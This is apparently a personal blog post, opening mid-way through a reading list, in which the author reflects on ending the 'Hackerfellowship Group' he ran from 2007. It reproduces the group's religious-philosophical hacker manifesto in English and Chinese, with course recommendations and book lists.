Interview with the Vampire - Anne Rice
The Vampire Lestat - Anne Rice
My Life: A Spoken Autobiography - Fidel Castro
Man, his nature and place in the world - Arnold Gehlen
Wild at heart - John Eldredge
Mathematics in Western Culture - Morris Kline
Metaphysics - Aristotle
Nine Talmudic Readings - Emmanuel Levinas
Mere Christianity(返朴归真) - C. S. Lewis
On the Trinity(论三位一体) - St. Augustine
Thoughts - Blaise Pascal
A History of Western Philosophy(西方哲学史) - Bertrand Russell
On Judaism(论犹太教) - Martin Buber
Shadows of the Mind: A Search for the Missing Science of Consciousness - Roger Penrose
God in Search of Man : A Philosophy of Judaism - AJB
Essence of Judaism - Leo Baeck
Everyman's Talmud - Abraham Cohen
The Matrix and Philosophy: Welcome to the Desert of the Real - William Irwin
Start-up Nation: The Story of Israel's Economic Miracle(创业的国度) - Saul Singer
Out of Control: The New Biology of Machines, Social Systems, and the Economic World(失控) - KK
What Technology Wants - KK
When Science Meets Religion: Enemies, Strangers, or Partners? - Ian G. Barbour
Foundation Series by Isaac Asimov
English Deism: Its Roots And Its Fruits - John Orr
The Singularity is near - Ray Kurzweil
Complexity: The Emerging Science at the Edge of Order and Chaos - M. Mitchell Waldrop
Hidden Order: How Adaptation Builds Complexity - John Holland
The Quark and the Jaguar: Adventures in the Simple and the Complex - Murray Gell-Mann
------------------------------------------------------------------------------------------
I became a christian in 2004. Then the following years I was reading/learning a lot of stuff about other people's consequence of ideas. In late 2007, after 3 years of thinking, I thought I was still lacking of "aha" ideas. There were more conversations in face-2-face back then. I sponsored a community to get a group of people together to discussion on some topics. HFG( Hackerfellowship Group) was born in 2007. We have had monthly meeting for 5 years. We also had a lot of discussions on mailinglist. People came and went. A lot of things happened. I tried to build HFG as an organic community but I totally failed. I neglected the most important factor in the organic community: People must already have organic life, hacker's life. I expected HFG could have the spirit of underground community but it never did. Because these guys I was hacking with who were not hackers even didn't understand what hacker ethic is. Nalaginrut/fU9ANg/口水猫/....you are not fucking hackers! How could people get used to talking about hacker ethic without any experience of underground scenes? Indeed, I was inspired by Phrack. That's why I ended HFG in my life journey. I'm becoming more like a security guy but not as a generic hacker. I shut down the mailing list and set it open for public. Someday in the future, will I be back? I don't know. Anything is possible if I really want to.
Don't give me wrong. Some of former HFG members are still my good friends. Unfortunately, only friends without brotherhood tag. I built my own fundamentally structure of philosophy with the experiences in HFG. Unfortunately again, it was only my philosophy, it always be. I finally decided to release the latest version of HFG manifesto on my blog last month. I hope it could help people who are struggling with sort of philosophic ideas. But I'm not sure if it really could be helpful. I just do what I should do. I know people would like to hear a happy ending. I'm so sorry, did I fuck your mind again? You fuc*ing tell me...
btw: Internet is a incredible system. No one gives a shit about who you are or what you believed in internet. What internet care is only about ideas. V is right about the ideas are immortality. No one can destroy the ideas.
-----------------------------------------------------------------------------------------------------
HFG( Hackerfellowship Group) manifesto alpha-end revised version
what is Fellowship?
In ancient Greece, the fellowship means a group of guys who are hacking together for achieving the same goal. The HackerFellowship will get hackers together for conversation/sharing/hacking. Hackers are always living in the future, and making the definition of the future!
What is our goal?
Hacking, find the truth! Because Hackers want/need truth. Hackers must experience sort of underground scenes. We are trying to build an underground online/offline community to help us digging deeper, which behind the surface. Hacking on 4-layer model of Theo/Philo/Math/Engi with inevitable complexity of this world...
I want to join in, but how?
Wait a min, my dear friend. We wish you could be one of us just like a brother(maybe you are a sister) return home. We all know that choose the strong philosophy is our only option. In the whole eco-system( Sunday school->brotherhood->community->start-up->company->Multi-regional corporation), building a brotherhood is our target. Once you get in, you must share some views/knowledge. Keep that in mind: what we are really concerning it's about your own philosophy, and we need you prove that you have these abilities or background below to contribute:
1, Join in a conversations like a philosopher who lived in ancient Greece.
2, If you are come from computer field, you should have basis computer programming skills either in C(think about the way of Turing Machine) or scheme(think about the way of Lambda calculus). And having the ability to make your own personal world view on computing field.
3, If you are atheist, we only accept those real atheist( like Ray Kurzweil?) who are looking for the truth whatever it costs. If you are not type of them, fuck outta of here.
4, If you are a christian, only the reformed faith(Lutheranism,Calvinist,neo-Calvinist,etc) are welcome in HFG! Because we need a christian who is willing to dedicate to cultural mandate( defined by reformed theology) in his/her hacking field.
Why HFG?
There may be dozen of reasons. We only list some highlighted ones:
1, We are type of people who are following the hacker ethic and focus on the purpose of life. Even we don't know the purpose or our position in this specific era. We are still trying to figure it out.
2, The brotherhood is like the 2nd foundation never existed. Wait...Where the hell is the 1st foundation? Do you get it? Join HFG, which means you have a chance to learn/hack on how to build an underground brotherhood.
3, Not all of us are comes from computer fields. A lot of people did really good job at non-computer field that we called them Generic hacker. Hacker ethic now affecting more places than our thought. We are hackers! We are anonymous! We have different hacking background. But we are sharing the same methodologies.
We suggest you could learn these courses on MIT OCW:
1, Structure and Interpretation of Computer Programs
2, Introduction to Computer Science and Programming( python)
3, Operating System Engineering
4, Computer Language Engineering
5, Practical Programming in C
6, Multicore Programming Primer
Techique topic:
1, Lisp interpreter
2, GNU/Linux
3, Open hardware
Some materials are our friendly arsenal:
------------------------------------------------------------------------------------------
The Holy Bible - SOMEONE
------------------------------------------------------------------------------------------
Hacker, Hacker, Hacker!!!
------------------------------------------------------------------------------------------
Hacker Ethics and the Spirit of the Information Age by Pekka Hiemann
Hackers: Heroes of the Computer Revolution by Steven Levy
Masters of Doom: How Two Guys Created an Empire and Transformed Pop Culture - David Kushner
Hackers and Painters: Big Ideas from the Computer Age by Paul Graham
The Art of Intrusion - Kevin Mitnick
------------------------------------------------------------------------------------------
Ideas - Theological philosphy & Philosophical theology
------------------------------------------------------------------------------------------
The Institution of Christian Religion - John Cavlin
Redeeming Science - Vern Sheridan Poythress
The Silmarillion -
The trilogy of The Lord of the Rings -
The Protestant Ethic and the Spirit of Capitalism - Max Webber
The Consequences of Ideas: Understanding the Concepts that Shaped Our World - R. C. Sproul
Making Sense of It All Pascal and the Meaning of Life - Thomas V. Morris
Worldview: The History of a Concept - David K. Naugle
Augustine's Confessions - St.Augestine
The Great Philosophers - Karl Theodor Jaspers
Truth or Consequences: The Promise & Perils of Postmodernism - Millard J. Erickson
Twilight of the Idols - Friedrich Nietzsche
The Will to Power - Friedrich Nietzsche
Philosophical Fragments - Soren Aabye Kierkegaard
Interview with the Vampire - Anne Rice
The Vampire Lestat - Anne Rice
My Life: A Spoken Autobiography - Fidel Castro
Man, his nature and place in the world - Arnold Gehlen
Wild at heart - John Eldredge
Mathematics in Western Culture - Morris Kline
Metaphysics - Aristotle
Nine Talmudic Readings - Emmanuel Levinas
Mere Christianity - C. S. Lewis
On the Trinity - St.Augestine
Thoughts - Blaise Pascal
A History of Western Philosophy - Bertrand Russell
On Judaism - Martin Buber
Shadows of the Mind: A Search for the Missing Science of Consciousness - Roger Penrose
God in Search of Man: A Philosophy of Judaism - AJB
Essence of Judaism - Leo Baeck
Everyman's Talmud - Abraham Cohen
The Matrix and Philosophy: Welcome to the Desert of the Real - William Irwin
Start-up Nation: The Story of Israel's Economic Miracle - Saul Singer
Out of Control: The New Biology of Machines, Social Systems, and the Economic World - KK
What Technology Wants - KK
When Science Meets Religion: Enemies, Strangers, or Partners? - Ian G. Barbour
Foundation Series by Isaac Asimov
English Deism: Its Roots And Its Fruits - John Orr
The Singularity is near - Ray Kurzweil
Complexity: The Emerging Science at the Edge of Order and Chaos - M. Mitchell Waldrop
Hidden Order: How Adaptation Builds Complexity - John Holland
The Quark and the Jaguar: Adventures in the Simple and the Complex - Murray Gell-Mann
------------------------------------------------------------------------------------------
Chinese version
What is a Fellowship?
In ancient Greece, "fellowship" meant a group of people with a common purpose gathering together to get something done. HFG is such a place. Hackers always live in the future, and they are also the builders of the future!
Our goal?
Hacking: finding the truth in every field, because the hacker's heart craves truth. The underground scene is an experience every hacker must have. We are trying to build an underground community, online and offline, to help ourselves dig out the truth beneath the surface. Hacking through the whole four-layer model (theology / philosophy / mathematics / engineering) inevitably runs into the complexity of the world.
Requirements for joining HFG:
Please think seriously about your motivation for joining HFG. HFG is like a brotherhood (note: a brotherhood is not a stagnant "soy-sauce vat"); you must share your thoughts, because that is how more "aha" moments are struck. Besides a willingness to share, you must also meet the following conditions:
1, Come to the discussion with an open mind; we care about your philosophy, not second-hand knowledge.
2, If you come from the field of computing, you must at least have programming experience: a foundation in C (the Turing-machine route) or in Scheme (the lambda-calculus route), and the ability to build a worldview of computer science.
3, If you are an atheist, we only accept genuine atheists, because they will pay any price in the search for truth; if you are an atheist in the popular sense, get lost right now!
4, If you are a Christian, only the Reformed faith (Lutheran, Calvinist, etc.) is accepted by HFG, because they are willing to commit themselves to the cultural mandate in every field.
Why join HFG?
There may be many reasons, but here we list only the most important ones:
1, We are a group of people striving to find the meaning of life and to follow the hacker ethic. Even if we have not yet figured out the meaning of our existence or our place in this era, that is fine; we will figure it out.
2, The brotherhood, like the Second Foundation, has never existed. Wait... then where is the First Foundation? Do you get the metaphor? Joining HFG means, at the very least, that you can learn about and take part in building an underground brotherhood.
3, Not everyone comes from the field of computing. Many people do excellent work in non-computing fields; we simply call them Generic Hackers. The influence of the hacker ethic goes far beyond what we imagine. We are hackers! We are Anonymous! We have different hacking experiences and backgrounds, but we share the same methodology.
MIT OCW courses recommended by HFG:
1, Structure and Interpretation of Computer Programs
2, Introduction to Computer Science and Programming (Python)
3, Operating System Engineering
4, Computer Language Engineering
5, Practical Programming in C
6, Multicore Programming Primer
Technical topics in the computing field:
1, Lisp interpreter
2, GNU/Linux
3, Open hardware
Reference reading:
------------------------------------------------------------------------------------------
The Holy Bible - SOMEONE
------------------------------------------------------------------------------------------
Hacker, Hacker, Hacker!!!
------------------------------------------------------------------------------------------
Hacker Ethics and the Spirit of the Information Age by Pekka Himanen
Hackers: Heroes of the Computer Revolution by Steven Levy
Masters of Doom: How Two Guys Created an Empire and Transformed Pop Culture - David Kushner
Hackers and Painters: Big Ideas from the Computer Age by Paul Graham
The Art of Intrusion - Kevin Mitnick
------------------------------------------------------------------------------------------
Ideas - Theological philosophy & Philosophical theology
------------------------------------------------------------------------------------------
The Institution of Christian Religion - John Calvin
Redeeming Science - Vern Sheridan Poythress
The Silmarillion - John Ronald Reuel Tolkien
The Trilogy of The Lord of the Rings - John Ronald Reuel Tolkien
The Protestant Ethic and the Spirit of Capitalism - Max Weber
The Consequences of Ideas: Understanding the Concepts that Shaped Our World - R. C. Sproul
Making Sense of It All: Pascal and the Meaning of Life - Thomas V. Morris
Worldview: The History of a Concept - David K. Naugle
Augustine's Confessions - St. Augustine
The Great Philosophers - Karl Theodor Jaspers
Truth or Consequences: The Promise & Perils of Postmodernism - Millard J. Erickson
Twilight of the Idols - Friedrich Nietzsche
The Will to Power - Friedrich Nietzsche
Philosophical Fragments - Soren Aabye Kierkegaard
Interview with the Vampire - Anne Rice
The Vampire Lestat - Anne Rice
My Life: A Spoken Autobiography - Fidel Castro
Man, his nature and place in the world - Arnold Gehlen
Wild at heart - John Eldredge
Mathematics in Western Culture - Morris Kline
Metaphysics - Aristotle
Nine Talmudic Readings - Emmanuel Levinas
Mere Christianity - C. S. Lewis
On the Trinity - St. Augustine
Thoughts - Blaise Pascal
A History of Western Philosophy - Bertrand Russell
On Judaism - Martin Buber
Shadows of the Mind: A Search for the Missing Science of Consciousness - Roger Penrose
God in Search of Man: A Philosophy of Judaism - AJB
Essence of Judaism - Leo Baeck
Everyman's Talmud - Abraham Cohen
The Matrix and Philosophy: Welcome to the Desert of the Real - William Irwin
Start-up Nation: The Story of Israel's Economic Miracle - Saul Singer
Out of Control: The New Biology of Machines, Social Systems, and the Economic World - KK
What Technology Wants - KK
When Science Meets Religion: Enemies, Strangers, or Partners? - Ian G. Barbour
Foundation Series by Isaac Asimov
English Deism: Its Roots And Its Fruits - John Orr
The Singularity is near - Ray Kurzweil
Complexity: The Emerging Science at the Edge of Order and Chaos - M. Mitchell Waldrop
Hidden Order: How Adaptation Builds Complexity - John Holland
The Quark and the Jaguar: Adventures in the Simple and the Complex - Murray Gell-Mann
------------------------------------------------------------------------------------------